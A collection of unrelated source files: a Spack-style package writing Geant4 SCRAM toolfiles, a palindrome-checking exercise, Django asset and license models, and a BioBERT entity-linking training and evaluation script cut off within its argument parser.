sys.path.append(os.path.join(os.path.dirname(__file__), '../../common'))
from scrampackage import write_scram_toolfile
class Geant4Toolfile(Package):
url = 'file://' + os.path.dirname(__file__) + '/../../common/junk.xml'
version('1.0', '68841b7dcbd130afd7d236afe8fd5b949f017615', expand=False)
depends_on('geant4-cms')
def install(self, spec, prefix):
values = {}
values['GEANT4_VER'] = spec['geant4-cms'].version
values['GEANT4_PREFIX'] = spec['geant4-cms'].prefix
fname = 'geant4.xml'
contents = str("""
<tool name="geant4" version="${GEANT4_VER}">
<info url="http://geant4.web.cern.ch/geant4/"/>
<use name="geant4core"/>
<use name="geant4vis"/>
<use name="xerces-c"/>
</tool>
""")
write_scram_toolfile(contents, values, fname, prefix)
fname = 'geant4core.xml'
contents = str("""
<tool name="geant4core" version="${GEANT4_VER}">
<info url="http://geant4.web.cern.ch/geant4/"/>
<lib name="G4digits_hits"/>
<lib name="G4error_propagation"/>
<lib name="G4event"/>
<lib name="G4geometry"/>
<lib name="G4global"/>
<lib name="G4graphics_reps"/>
<lib name="G4intercoms"/>
<lib name="G4interfaces"/>
<lib name="G4materials"/>
<lib name="G4parmodels"/>
<lib name="G4particles"/>
<lib name="G4persistency"/>
<lib name="G4physicslists"/>
<lib name="G4processes"/>
<lib name="G4readout"/>
<lib name="G4run"/>
<lib name="G4tracking"/>
<lib name="G4track"/>
<lib name="G4analysis"/>
<flags CXXFLAGS="-DG4MULTITHREADED -DG4USE_STD11 -ftls-model=global-dynamic -pthread"/>
<client>
<environment name="GEANT4_BASE" default="${GEANT4_PREFIX}"/>
<environment name="LIBDIR" default="$$GEANT4_BASE/lib"/>
<environment name="G4LIB" value="$$LIBDIR"/>
<environment name="INCLUDE" default="$$GEANT4_BASE/include/Geant4"/>
</client>
<runtime name="ROOT_INCLUDE_PATH" value="$$INCLUDE" type="path"/>
<flags cppdefines="GNU_GCC G4V9"/>
<use name="clhep"/>
<use name="root_cxxdefaults"/>
<flags SKIP_TOOL_SYMLINKS="1"/>
</tool>
""")
write_scram_toolfile(contents, values, fname, prefix)
fname = 'geant4data.xml'
contents = str("""
<tool name="geant4data" version="${GEANT4_VER}">
<use name="geant4data_g4abla"/>
<use name="geant4data_g4emlow"/>
<use name="geant4data_g4ensdfstate"/>
<use name="geant4data_g4ndl"/>
<use name="geant4data_g4neutronsxs"/>
<use name="geant4data_g4photonevaporation"/>
<use name="geant4data_g4radioactivedecay"/>
<use name="geant4data_g4saiddata"/>
</tool>
""")
write_scram_toolfile(contents, values, fname, prefix)
fname = 'geant4vis.xml'
contents = str("""
<tool name="geant4vis" version="${GEANT4_VER}">
<info url="http://geant4.web.cern.ch/geant4/"/>
<lib name="G4FR"/>
<lib name="G4modeling"/>
<lib name="G4RayTracer"/>
<lib name="G4Tree"/>
<lib name="G4visHepRep"/>
<lib name="G4vis_management"/>
<lib name="G4visXXX"/>
<lib name="G4VRML"/>
<lib name="G4GMocren"/>
<lib name="G4zlib"/>
<use name="geant4core"/>
</tool>
""")
write_scram_toolfile(contents, values, fname, prefix)
|
# Given a string, determine if it is a palindrome, considering
# only alphanumeric characters and ignoring cases.
# Note: For the purpose of this problem, we define empty string as
# valid palindrome.
# Example 1:
# Input: "A man, a plan, a canal: Panama"
# Output: true
# Example 2:
# Input: "race a car"
# Output: false
import re
pattern = re.compile("\W+")
class Solution:
def isPalindrome(self, s: str) -> bool:
s_new = list(re.sub(pattern, '', s).lower())
return s_new == s_new[::-1]
sol = Solution()
print(sol.isPalindrome("A man, a plan, a canal: Panama"))
print(sol.isPalindrome("race a car"))
|
from django.db import models
# from project.models import Project
# Create your models here.
class Assetmaster(models.Model):
asset_master_id = models.AutoField(primary_key=True)
project = models.ForeignKey('project.Project')
asset = models.ForeignKey('Device')
sn = models.CharField(max_length=100)
no_registrasi = models.CharField(max_length=100)
location = models.TextField(max_length=500,blank=True)
remark = models.TextField(max_length=500,blank=True)
# qty = models.IntegerField(max_length=100)
table_updated = models.DateField(auto_now=True, auto_now_add=False)
table_creation_timestamp = models.DateField(auto_now=False, auto_now_add=True)
def __str__(self):
return "%s - %s - %s - %s" % (self.asset, self.sn, self.no_registrasi, self.project.customer.all()[0])
class Device(models.Model):
chose_type_device = (
('hw', 'Hardware'),
('sw', 'Software'),
)
device_id = models.AutoField(primary_key=True)
device_name = models.CharField(max_length=100)
device_type = models.CharField(max_length=2, choices=chose_type_device)
spec = models.TextField(max_length=500)
def __str__(self):
return self.device_name
class License(models.Model):
chose_type_license = (
('sub', 'Subsciption'),
('sup', 'Support'),
('per', 'Perpetual'),
)
license_id = models.AutoField(primary_key=True)
asset_master = models.ForeignKey('Assetmaster')
license_name = models.CharField(max_length=100)
type_license = models.CharField(max_length=3, choices=chose_type_license)
license_start_date = models.DateField(auto_now=False, auto_now_add=False)
license_end_date = models.DateField(auto_now=False, auto_now_add=False)
remark = models.TextField(max_length=500,blank=True)
def __str__(self):
return "%s - %s" % (self.license_name, self.asset_master.asset.device_name)
|
# coding=utf-8
""" Finetuning BioBERT models on MedMentions.
Adapted from HuggingFace `examples/run_glue.py`"""
import argparse
import glob
import logging
import os
import random
import math
import numpy as np
import torch
from torch.utils.data import DataLoader, RandomSampler, SequentialSampler, TensorDataset
from torch.utils.data.distributed import DistributedSampler
from tqdm import tqdm, trange
import pdb
from transformers import (
WEIGHTS_NAME,
AdamW,
# BertConfig,
# BertForSequenceClassification,
# BertTokenizer,
DistilBertConfig,
DistilBertForSequenceClassification,
DistilBertTokenizer,
XLMConfig,
XLMForSequenceClassification,
XLMTokenizer,
get_linear_schedule_with_warmup,
)
from utils_e2e_span import get_examples, convert_examples_to_features
from modeling_bert import BertModel
from tokenization_bert import BertTokenizer
from configuration_bert import BertConfig
from modeling_e2e_span import DualEncoderBert, PreDualEncoder
from torch.utils.tensorboard import SummaryWriter
logger = logging.getLogger(__name__)
ALL_MODELS = sum(
(tuple(conf.pretrained_config_archive_map.keys()) for conf in [BertConfig]), ()
)
MODEL_CLASSES = {
"bert": (BertConfig, BertModel, BertTokenizer),
}
def set_seed(args):
random.seed(args.seed)
np.random.seed(args.seed)
torch.manual_seed(args.seed)
if args.n_gpu > 0:
torch.cuda.manual_seed_all(args.seed)
def train(args, model, tokenizer):
""" Train the model """
if args.local_rank in [-1, 0]:
tb_writer = SummaryWriter()
# Initial train dataloader
if args.use_random_candidates:
train_dataset, _, _= load_and_cache_examples(args, tokenizer)
elif args.use_hard_negatives or args.use_hard_and_random_negatives:
train_dataset, _, _ = load_and_cache_examples(args, tokenizer, model)
else:
train_dataset, _, _ = load_and_cache_examples(args, tokenizer)
args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
train_sampler = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(train_dataset)
train_dataloader = DataLoader(train_dataset, sampler=train_sampler, batch_size=args.train_batch_size)
if args.max_steps > 0:
t_total = args.max_steps
args.num_train_epochs = args.max_steps // (len(train_dataloader) // args.gradient_accumulation_steps) + 1
else:
t_total = len(train_dataloader) // args.gradient_accumulation_steps * args.num_train_epochs
# Prepare optimizer and schedule (linear warmup and decay)
no_decay = ["bias", "LayerNorm.weight"]
optimizer_grouped_parameters = [
{
"params": [p for n, p in model.named_parameters() if not any(nd in n for nd in no_decay)],
"weight_decay": args.weight_decay,
},
{"params": [p for n, p in model.named_parameters() if any(nd in n for nd in no_decay)], "weight_decay": 0.0},
]
optimizer = AdamW(optimizer_grouped_parameters, lr=args.learning_rate, eps=args.adam_epsilon)
scheduler = get_linear_schedule_with_warmup(
optimizer, num_warmup_steps=args.warmup_steps, num_training_steps=t_total
)
# Check if saved optimizer or scheduler states exist
if args.resume_path is not None and os.path.isfile(os.path.join(args.resume_path, "optimizer.pt")) \
and os.path.isfile(os.path.join(args.resume_path, "scheduler.pt")
):
# Load in optimizer and scheduler states
optimizer.load_state_dict(torch.load(os.path.join(args.resume_path, "optimizer.pt")))
scheduler.load_state_dict(torch.load(os.path.join(args.resume_path, "scheduler.pt")))
logger.info("INFO: Optimizer and scheduler state loaded successfully.")
if args.fp16:
try:
from apex import amp
except ImportError:
raise ImportError("Please install apex from https://www.github.com/nvidia/apex to use fp16 training.")
model, optimizer = amp.initialize(model, optimizer, opt_level=args.fp16_opt_level)
# multi-gpu training (should be after apex fp16 initialization)
if args.n_gpu > 1:
model = torch.nn.DataParallel(model)
# Distributed training (should be after apex fp16 initialization)
if args.local_rank != -1:
model = torch.nn.parallel.DistributedDataParallel(
model, device_ids=[args.local_rank], output_device=args.local_rank, find_unused_parameters=True
)
# For debugging: Register backward hooks to check gradient
# def hook(self, grad_in, grad_out):
# print(self)
# print('grad_in')
# print([_grad_in for _grad_in in grad_in if _grad_in is not None])
# print('grad_out')
# print([_grad_out for _grad_out in grad_out if _grad_out is not None])
#
# for module in model.modules():
# module.register_backward_hook(hook)
# Train!
logger.info("***** Running training *****")
logger.info(" Num examples = %d", len(train_dataset))
logger.info(" Num Epochs = %d", args.num_train_epochs)
logger.info(" Instantaneous batch size per GPU = %d", args.per_gpu_train_batch_size)
logger.info(
" Total train batch size (w. parallel, distributed & accumulation) = %d",
args.train_batch_size
* args.gradient_accumulation_steps
* (torch.distributed.get_world_size() if args.local_rank != -1 else 1),
)
logger.info(" Gradient Accumulation steps = %d", args.gradient_accumulation_steps)
logger.info(" Total optimization steps = %d", t_total)
global_step = 0
epochs_trained = 0
steps_trained_in_current_epoch = 0
# Check if continuing training from a checkpoint
if args.resume_path is not None:
# set global_step to global_step of last saved checkpoint from model path
# global_step = int(args.model_name_or_path.split("-")[-1].split("/")[0])
global_step = int(args.resume_path.split("/")[-2].split("-")[-1])
epochs_trained = global_step // (len(train_dataloader) // args.gradient_accumulation_steps)
steps_trained_in_current_epoch = global_step % (len(train_dataloader) // args.gradient_accumulation_steps)
logger.info(" Continuing training from checkpoint, will skip to saved global_step")
logger.info(" Continuing training from epoch %d", epochs_trained)
logger.info(" Continuing training from global step %d", global_step)
logger.info(" Will skip the first %d steps in the first epoch", steps_trained_in_current_epoch)
tr_loss, logging_loss = 0.0, 0.0
model.zero_grad()
train_iterator = trange(
epochs_trained, int(args.num_train_epochs), desc="Epoch", disable=args.local_rank not in [-1, 0]
)
set_seed(args) # Added here for reproductibility
for epoch_num in train_iterator:
epoch_iterator = tqdm(train_dataloader, desc="Iteration", disable=args.local_rank not in [-1, 0])
for step, batch in enumerate(epoch_iterator):
# Skip past any already trained steps if resuming training
if steps_trained_in_current_epoch > 0:
steps_trained_in_current_epoch -= 1
continue
model.train()
batch = tuple(t.to(args.device) for t in batch)
ner_inputs = {"args": args,
"mention_token_ids": batch[0],
"mention_token_masks": batch[1],
"mention_start_indices": batch[7],
"mention_end_indices": batch[8],
"mode": 'ner',
}
if args.use_hard_and_random_negatives:
ned_inputs = {"args": args,
"last_hidden_states": None,
"mention_start_indices": batch[7],
"mention_end_indices": batch[8],
"candidate_token_ids_1": batch[2],
"candidate_token_masks_1": batch[3],
"candidate_token_ids_2": batch[4],
"candidate_token_masks_2": batch[5],
"labels": batch[6],
"mode": 'ned',
}
else:
ned_inputs = {"args": args,
"mention_token_ids": batch[0],
"mention_token_masks": batch[1],
"mention_start_indices": batch[7],
"mention_end_indices": batch[8],
"candidate_token_ids_1": batch[2],
"candidate_token_masks_1": batch[3],
"labels": batch[6],
"mode": 'ned',
}
if args.ner:
loss, _ = model.forward(**ner_inputs)
elif args.alternate_batch:
# Randomly choose whether to do tagging or NED for the current batch
if random.random() <= 0.5:
loss = model.forward(**ner_inputs)
else:
loss, _ = model.forward(**ned_inputs)
elif args.ner_and_ned:
ner_loss, last_hidden_states = model.forward(**ner_inputs)
ned_inputs["last_hidden_states"] = last_hidden_states
ned_loss, _ = model.forward(**ned_inputs)
loss = ner_loss + ned_loss
else:
logger.info(" Specify a training protocol from (ner, alternate_batch, ner_and_ned)")
if args.n_gpu > 1:
loss = loss.mean() # mean() to average on multi-gpu parallel training
if args.gradient_accumulation_steps > 1:
loss = loss / args.gradient_accumulation_steps
if args.fp16:
with amp.scale_loss(loss, optimizer) as scaled_loss:
scaled_loss.backward()
else:
loss.backward()
tr_loss += loss.item()
if (step + 1) % args.gradient_accumulation_steps == 0:
if args.fp16:
torch.nn.utils.clip_grad_norm_(amp.master_params(optimizer), args.max_grad_norm)
else:
torch.nn.utils.clip_grad_norm_(model.parameters(), args.max_grad_norm)
optimizer.step()
scheduler.step() # Update learning rate schedule
model.zero_grad()
global_step += 1
if args.local_rank in [-1, 0] and args.logging_steps > 0 and global_step % args.logging_steps == 0:
# Log metrics
if (
args.local_rank == -1 and args.evaluate_during_training
): # Only evaluate when single GPU otherwise metrics may not average well
results = evaluate(args, model, tokenizer)
for key, value in results.items():
tb_writer.add_scalar("eval_{}".format(key), value, global_step)
tb_writer.add_scalar("lr", scheduler.get_lr()[0], global_step)
tb_writer.add_scalar("loss", (tr_loss - logging_loss) / args.logging_steps, global_step)
logging_loss = tr_loss
if args.local_rank in [-1, 0] and args.save_steps > 0 and global_step % args.save_steps == 0:
# Save model checkpoint
output_dir = os.path.join(args.output_dir, "checkpoint-{}".format(global_step))
if not os.path.exists(output_dir):
os.makedirs(output_dir)
model_to_save = (
model.module if hasattr(model, "module") else model
) # Take care of distributed/parallel training
model_to_save.save_pretrained(output_dir)
tokenizer.save_pretrained(output_dir)
torch.save(args, os.path.join(output_dir, "training_args.bin"))
logger.info("Saving model checkpoint to %s", output_dir)
torch.save(optimizer.state_dict(), os.path.join(output_dir, "optimizer.pt"))
torch.save(scheduler.state_dict(), os.path.join(output_dir, "scheduler.pt"))
logger.info("Saving optimizer and scheduler states to %s", output_dir)
if args.max_steps > 0 and global_step > args.max_steps:
epoch_iterator.close()
break
if args.max_steps > 0 and global_step > args.max_steps:
train_iterator.close()
break
# New data loader for the next epoch
if args.use_random_candidates:
# New data loader at every epoch for random sampler if we use random negative samples
train_dataset, _, _= load_and_cache_examples(args, tokenizer)
args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
train_sampler = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(
train_dataset)
train_dataloader = DataLoader(train_dataset, sampler=train_sampler,
batch_size=args.train_batch_size)
elif args.use_hard_negatives or args.use_hard_and_random_negatives:
# New data loader at every epoch for hard negative sampler if we use hard negative mining
train_dataset, _, _= load_and_cache_examples(args, tokenizer, model)
args.train_batch_size = args.per_gpu_train_batch_size * max(1, args.n_gpu)
train_sampler = RandomSampler(train_dataset) if args.local_rank == -1 else DistributedSampler(
train_dataset)
train_dataloader = DataLoader(train_dataset, sampler=train_sampler,
batch_size=args.train_batch_size)
# Anneal the lamba_1 nd lambda_2 weights
args.lambda_1 = args.lambda_1 - 1 / (epoch_num + 1)
args.lambda_2 = args.lambda_2 + 1 / (epoch_num + 1)
if args.local_rank in [-1, 0]:
tb_writer.close()
return global_step, tr_loss / global_step
def evaluate(args, model, tokenizer, prefix=""):
eval_output_dir = args.output_dir
eval_dataset, (all_entities, all_entity_token_ids, all_entity_token_masks), \
(all_document_ids, all_label_candidate_ids) = load_and_cache_examples(args, tokenizer)
if not os.path.exists(eval_output_dir) and args.local_rank in [-1, 0]:
os.makedirs(eval_output_dir)
args.eval_batch_size = args.per_gpu_eval_batch_size * max(1, args.n_gpu)
# Note that DistributedSampler samples randomly
eval_sampler = SequentialSampler(eval_dataset)
eval_dataloader = DataLoader(eval_dataset, sampler=eval_sampler, batch_size=args.eval_batch_size)
# multi-gpu eval
if args.n_gpu > 1:
model = torch.nn.DataParallel(model)
if args.use_all_candidates:
all_candidate_embeddings = []
with torch.no_grad():
for i, _ in enumerate(all_entity_token_ids):
entity_tokens = all_entity_token_ids[i]
entity_tokens_masks = all_entity_token_masks[i]
candidate_token_ids = torch.LongTensor([entity_tokens]).to(args.device)
candidate_token_masks = torch.LongTensor([entity_tokens_masks]).to(args.device)
if args.n_gpu > 1:
candidate_outputs = model.module.bert_candidate.bert(
input_ids=candidate_token_ids,
attention_mask=candidate_token_masks,
)
else:
candidate_outputs = model.bert_candidate.bert(
input_ids=candidate_token_ids,
attention_mask=candidate_token_masks,
)
candidate_embedding = candidate_outputs[1]
all_candidate_embeddings.append(candidate_embedding)
all_candidate_embeddings = torch.cat(all_candidate_embeddings, dim=0)
logger.info("INFO: Collected all candidate embeddings.")
print("Tensor size = ", all_candidate_embeddings.size())
all_candidate_embeddings = all_candidate_embeddings.unsqueeze(0).expand(args.eval_batch_size, -1, -1)
# Eval!
logger.info("***** Running evaluation {} *****".format(prefix))
logger.info(" Num examples = %d", len(eval_dataset))
logger.info(" Batch size = %d", args.eval_batch_size)
eval_loss = 0.0
nb_eval_steps = 0
results = {}
p_1 = 0
map = 0
r_10 = 0
nb_samples = 0
nb_normalized = 0
tp = 0
fp = 0
fn = 0
def get_mention_spans(mention_token_ids, predicted_tags, doc_lens):
b_size = predicted_tags.size(0)
b_start_indices = []
b_end_indices = []
for b_idx in range(b_size):
tags = predicted_tags[b_idx].cpu().numpy()
start_indices = []
end_indices = []
start_index = 0
end_index = 0
# for j in range(doc_lens[b_idx]):
# if tags[j] == 1: # If the token tag is 1, this is the beginning of a mention
# start_index = j
# end_index = j
# elif tags[j] == 2:
# if j == 0: # It is the first token (ideally shouldn't be though as it corresponds to the [CLS] token
# start_index = j
# end_index = j
# else:
# if tags[j-1] == 1 or tags[j-1] == 2: # If the previous token is 1, then it's a part of a mention
# end_index += 1
# elif tags[j-1] == 0: # If the previous token is 0, it's the start of a mention (imperfect though)
# start_index = j
# end_index = j
# elif tags[j] == 0 and (tags[j-1] == 1 or tags[j-1] == 2): # End of mention
# start_indices.append(start_index)
# end_indices.append(end_index)
mention_found = False
for j in range(1, doc_lens[b_idx] - 1): # Excluding [CLS], [SEP]
if tags[j] == 1: # If the token tag is 1, this is the beginning of a mention B
start_index = j
end_index = j
for k in range(j+1, doc_lens[b_idx] - 1):
if tokenizer.convert_ids_to_tokens([mention_token_ids[b_idx][k]])[0].startswith('##'):
j += 1
end_index += 1
else:
break
mention_found = True
elif tags[j] == 2:
if tags[j-1] == 0: # If the previous token is 0, it's the start of a mention (imperfect though)
start_index = j
end_index = j
else:
end_index += 1
for k in range(j+1, doc_lens[b_idx] - 1):
if tokenizer.convert_ids_to_tokens([mention_token_ids[b_idx][k]])[0].startswith('##'):
j += 1
end_index += 1
else:
break
mention_found = True
elif tags[j] == 0 and mention_found: # End of mention
start_indices.append(start_index)
end_indices.append(end_index)
mention_found = False
# If the last token(s) are a mention
if mention_found:
start_indices.append(start_index)
end_indices.append(end_index)
b_start_indices.append(start_indices)
b_end_indices.append(end_indices)
return b_start_indices, b_end_indices
def find_partially_overlapping_spans(pred_mention_start_indices, pred_mention_end_indices,\
gold_mention_start_indices, gold_mention_end_indices, doc_lens):
b_size = gold_mention_start_indices.shape[0]
num_mentions = gold_mention_start_indices.shape[1]
# Get the Gold mention spans as tuples
gold_mention_spans = [[(gold_mention_start_indices[b_idx][j], gold_mention_end_indices[b_idx][j]) \
for j in range(num_mentions)]
for b_idx in range(b_size)]
# Get the predicted mention spans as tuples
predicted_mention_spans = [[] for b_idx in range(b_size)]
for b_idx in range(b_size):
num_pred_mentions = len(pred_mention_start_indices[b_idx])
for j in range(num_pred_mentions):
predicted_mention_spans[b_idx].append((pred_mention_start_indices[b_idx][j], pred_mention_end_indices[b_idx][j]))
unmatched_gold_mentions = 0
extraneous_predicted_mentions = 0
b_overlapping_start_indices = []
b_overlapping_end_indices = []
b_which_gold_spans = []
for b_idx in range(b_size):
overlapping_start_indices = []
overlapping_end_indices = []
which_gold_spans = []
p_mention_spans = predicted_mention_spans[b_idx]
g_mention_spans = gold_mention_spans[b_idx]
for span_num, (g_s, g_e) in enumerate(g_mention_spans):
found_overlapping_pred = False
for (p_s, p_e) in p_mention_spans:
if p_s >= doc_lens[b_idx]: # If the predicted start index is beyond valid tokens
break
elif g_s <= p_s <= g_e: # The beginning of prediction is within the gold span
overlapping_start_indices.append(p_s)
if g_e <= p_e:
overlapping_end_indices.append(g_e)
else:
overlapping_end_indices.append(p_e)
which_gold_spans.append(span_num)
found_overlapping_pred = True
elif g_s <= p_e <= g_e: # The end of the predicted span is within the gold span
if g_s >= p_s:
overlapping_start_indices.append(g_s)
else:
overlapping_start_indices.append(p_s)
overlapping_end_indices.append(p_e)
which_gold_spans.append(span_num)
found_overlapping_pred = True
if not found_overlapping_pred:
unmatched_gold_mentions += 1
for (p_s, p_e) in p_mention_spans:
if p_s >= doc_lens[b_idx]: # If the start index is beyond valid tokens
break
found_overlapping_pred = False
for (g_s, g_e) in g_mention_spans:
if g_s <= p_s <= g_e: # The beginning of prediction is withing the gold span
found_overlapping_pred = True
elif g_s <= p_e <= g_e: # The end of the predicted span is within the gold span
found_overlapping_pred = True
if not found_overlapping_pred:
extraneous_predicted_mentions += 1
b_overlapping_start_indices.append(overlapping_start_indices)
b_overlapping_end_indices.append(overlapping_end_indices)
b_which_gold_spans.append(which_gold_spans)
return unmatched_gold_mentions, extraneous_predicted_mentions, \
b_overlapping_start_indices, b_overlapping_end_indices, b_which_gold_spans
# Files to write
gold_file = open('gold.csv', 'w+')
pred_file = open('pred.csv', 'w+')
num_mention_processed = 0
for batch in tqdm(eval_dataloader, desc="Evaluating"):
model.eval()
batch = tuple(t.to(args.device) for t in batch)
with torch.no_grad():
doc_input = {"args": args,
"mention_token_ids": batch[0],
"mention_token_masks": batch[1],
"mode": 'ner',
}
pred_mention_start_indices, pred_mention_end_indices, pred_mention_span_scores, last_hidden_states = model.forward(**doc_input)
pred_mention_span_probs = torch.sigmoid(pred_mention_span_scores)
spans_after_prunning = torch.where(pred_mention_span_probs >= args.gamma)
if spans_after_prunning[0].size(0) <= 0:
_, spans_after_prunning = torch.topk(pred_mention_span_probs, 8)
# print(spans_after_prunning)
mention_start_indices = pred_mention_start_indices[spans_after_prunning]
mention_end_indices = pred_mention_end_indices[spans_after_prunning]
if args.use_all_candidates:
mention_inputs = {"args": args,
"last_hidden_states": last_hidden_states,
"mention_start_indices": mention_start_indices.unsqueeze(0),
# batch[7], #overlapping_start_indices,
"mention_end_indices": mention_end_indices.unsqueeze(0),
# batch[8], # overlapping_end_indices,
"all_candidate_embeddings": all_candidate_embeddings,
"mode": 'ned',
}
else:
mention_inputs = {"args": args,
"last_hidden_states": last_hidden_states,
"mention_start_indices": mention_start_indices,
"mention_end_indices": mention_start_indices,
"candidate_token_ids_1": batch[2],
"candidate_token_masks_1": batch[3],
"mode": 'ned',
}
_, logits = model(**mention_inputs)
preds = logits.detach().cpu().numpy()
# out_label_ids = batch[6]
# out_label_ids = out_label_ids.reshape(-1).detach().cpu().numpy()
sorted_preds = np.flip(np.argsort(preds), axis=1)
predicted_entities = []
for i, sorted_pred in enumerate(sorted_preds):
predicted_entity_idx = sorted_preds[i][0]
predicted_entity = all_entities[predicted_entity_idx]
predicted_entities.append(predicted_entity)
# Write the gold entities
num_mentions = batch[9].detach().cpu().numpy()[0]
document_ids = all_document_ids[num_mention_processed:num_mention_processed + num_mentions]
assert all(doc_id == document_ids[0] for doc_id in document_ids)
gold_mention_start_indices = batch[7].detach().cpu().numpy()[0][:num_mentions]
gold_mention_end_indices = batch[8].detach().cpu().numpy()[0][:num_mentions]
gold_entities = all_label_candidate_ids[num_mention_processed:num_mention_processed + num_mentions]
for j in range(num_mentions):
# if gold_mention_start_indices[j] == gold_mention_end_indices[j]:
# gold_mention_end_indices[j] += 1
if gold_mention_start_indices[j] > gold_mention_end_indices[j]:
continue
gold_write = document_ids[j] + '\t' + str(gold_mention_start_indices[j]) \
+ '\t' + str(gold_mention_end_indices[j]) \
+ '\t' + str(gold_entities[j]) \
+ '\t' + str(1.0) \
+ '\t' + 'NA' + '\n'
gold_file.write(gold_write)
# Write the predicted entities
doc_id_processed = document_ids[0]
num_pred_mentions = len(predicted_entities)
mention_start_indices = mention_start_indices.detach().cpu().numpy()
mention_end_indices = mention_end_indices.detach().cpu().numpy()
mention_probs = pred_mention_span_probs[spans_after_prunning].detach().cpu().numpy()
for j in range(num_pred_mentions):
# if pred_mention_start_indices[j] == pred_mention_end_indices[j]:
# pred_mention_end_indices[j] += 1
if pred_mention_start_indices[j] > pred_mention_end_indices[j]:
continue
pred_write = doc_id_processed + '\t' + str(mention_start_indices[j]) \
+ '\t' + str(mention_end_indices[j]) \
+ '\t' + str(predicted_entities[j]) \
+ '\t' + str(mention_probs[j]) \
+ '\t' + 'NA' + '\n'
pred_file.write(pred_write)
num_mention_processed += num_mentions
# for b_idx in range(sorted_preds.size(0)):
# for i, sorted_pred in enumerate(sorted_preds):
# if out_label_ids[i] != -1:
# if out_label_ids[i] != -100:
# rank = np.where(sorted_pred == out_label_ids[i])[0][0] + 1
# map += 1 / rank
# if rank <= 10:
# r_10 += 1
# if rank == 1:
# p_1 += 1
# tp += 1 # This entity resolution is sucessful
# else:
# fn += 1 # Unsuccessful entity resolution
# else:
# fn += 1 # Unsuccessful entity resolution
# nb_normalized += 1
# nb_samples += 1
# nb_eval_steps += 1
#
# # Unnormalized precision
# p_1_unnormalized = p_1 / nb_samples
# map_unnormalized = map / nb_samples
#
# # Normalized precision
# p_1_normalized = p_1 / nb_normalized
# map_normalized = map / nb_normalized
#
# # Recall@10
# recall_10 = r_10 / nb_samples
#
# # Precision, recall, F-1
# macro_precision = tp / (tp + fp)
# macro_recall = tp / (tp + fn)
# macro_f1 = (2 * macro_precision * macro_recall) / (macro_precision + macro_recall)
#
# print("P@1 Unnormalized = ", p_1_unnormalized)
# print("MAP Unnormalized = ", map_unnormalized)
# print("P@1 Normaliized = ", p_1_normalized)
# print("MAP Normalized = ", map_normalized)
# print("Recall@10 = ", recall_10)
# print("Macro-Precision = ", macro_precision)
# print("Macro-Recall = ", macro_recall)
# print("Marcro-F-1 = ", macro_f1)
#
#
# results["P@1"] = p_1_unnormalized
# results["MAP"] = map_unnormalized
return results
def load_and_cache_examples(args, tokenizer, model=None):
if args.local_rank not in [-1, 0] and not evaluate:
torch.distributed.barrier() # Make sure only the first process in distributed training process the dataset, and the others will use the cache
mode = 'train' if args.do_train else 'test'
# Load data features from cache or dataset file
cached_features_file = os.path.join(
args.data_dir,
"cached_{}_{}".format(
mode,
list(filter(None, args.model_name_or_path.split("/"))).pop()),
)
if os.path.exists(cached_features_file) and not args.overwrite_cache:
logger.info("Loading features from cached file %s", cached_features_file)
features = torch.load(cached_features_file)
all_entities = np.load(os.path.join(args.data_dir, 'all_entities.npy'))
all_entity_token_ids = np.load(os.path.join(args.data_dir, 'all_entity_token_ids.npy'))
all_entity_token_masks = np.load(os.path.join(args.data_dir, 'all_entity_token_masks.npy'))
all_document_ids = np.load(os.path.join(args.data_dir, 'all_document_ids.npy'))
all_label_candidate_ids = np.load(os.path.join(args.data_dir, 'all_label_candidate_ids.npy'))
else:
logger.info("Creating features from dataset file at %s", args.data_dir)
examples, docs, entities = get_examples(args.data_dir, mode)
features, (all_entities, all_entity_token_ids, all_entity_token_masks), (all_document_ids, all_label_candidate_ids) = convert_examples_to_features(
examples,
docs,
entities,
args.max_seq_length,
tokenizer,
args,
model,
)
if args.local_rank in [-1, 0]:
logger.info("Saving features into cached file %s", cached_features_file)
torch.save(features, cached_features_file)
np.save(os.path.join(args.data_dir, 'all_entities.npy'),
np.array(all_entities))
np.save(os.path.join(args.data_dir, 'all_entity_token_ids.npy'),
np.array(all_entity_token_ids))
np.save(os.path.join(args.data_dir, 'all_entity_token_masks.npy'),
np.array(all_entity_token_masks))
np.save(os.path.join(args.data_dir, 'all_document_ids.npy'),
np.array(all_document_ids))
np.save(os.path.join(args.data_dir, 'all_label_candidate_ids.npy'),
np.array(all_label_candidate_ids))
if args.local_rank == 0 and not evaluate:
torch.distributed.barrier() # Make sure only the first process in distributed training process the dataset, and the others will use the cache
# Convert to Tensors and build dataset
all_mention_token_ids = torch.tensor([f.mention_token_ids for f in features], dtype=torch.long)
all_mention_token_masks = torch.tensor([f.mention_token_masks for f in features], dtype=torch.long)
all_candidate_token_ids_1 = torch.tensor([f.candidate_token_ids_1 if f.candidate_token_ids_1 is not None else [0] for f in features], dtype=torch.long)
all_candidate_token_masks_1 = torch.tensor([f.candidate_token_masks_1 if f.candidate_token_masks_1 is not None else [0] for f in features], dtype=torch.long)
all_candidate_token_ids_2 = torch.tensor([f.candidate_token_ids_2 if f.candidate_token_ids_2 is not None else [0] for f in features], dtype=torch.long)
all_candidate_token_masks_2 = torch.tensor([f.candidate_token_masks_2 if f.candidate_token_masks_2 is not None else [0] for f in features], dtype=torch.long)
all_labels = torch.tensor([f.label_ids for f in features], dtype=torch.long)
all_mention_start_indices = torch.tensor([f.mention_start_indices for f in features], dtype=torch.long)
all_mention_end_indices = torch.tensor([f.mention_end_indices for f in features], dtype=torch.long)
all_num_mentions = torch.tensor([f.num_mentions for f in features], dtype=torch.long)
all_seq_tag_ids = torch.tensor([f.seq_tag_ids for f in features], dtype=torch.long)
dataset = TensorDataset(all_mention_token_ids,
all_mention_token_masks,
all_candidate_token_ids_1,
all_candidate_token_masks_1,
all_candidate_token_ids_2,
all_candidate_token_masks_2,
all_labels,
all_mention_start_indices,
all_mention_end_indices,
all_num_mentions,
all_seq_tag_ids,
)
return dataset, (all_entities, all_entity_token_ids, all_entity_token_masks), (all_document_ids, all_label_candidate_ids)
def main():
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument(
"--data_dir",
default=None,
type=str,
required=True,
help="The input data dir. Should contain the .tsv files (or other data files) for the task.",
)
parser.add_argument(
"--model_type",
default=None,
type=str,
required=True,
help="Model type selected in the list: " + ", ".join(MODEL_CLASSES.keys()),
)
parser.add_argument(
"--model_name_or_path",
default=None,
type=str,
required=True,
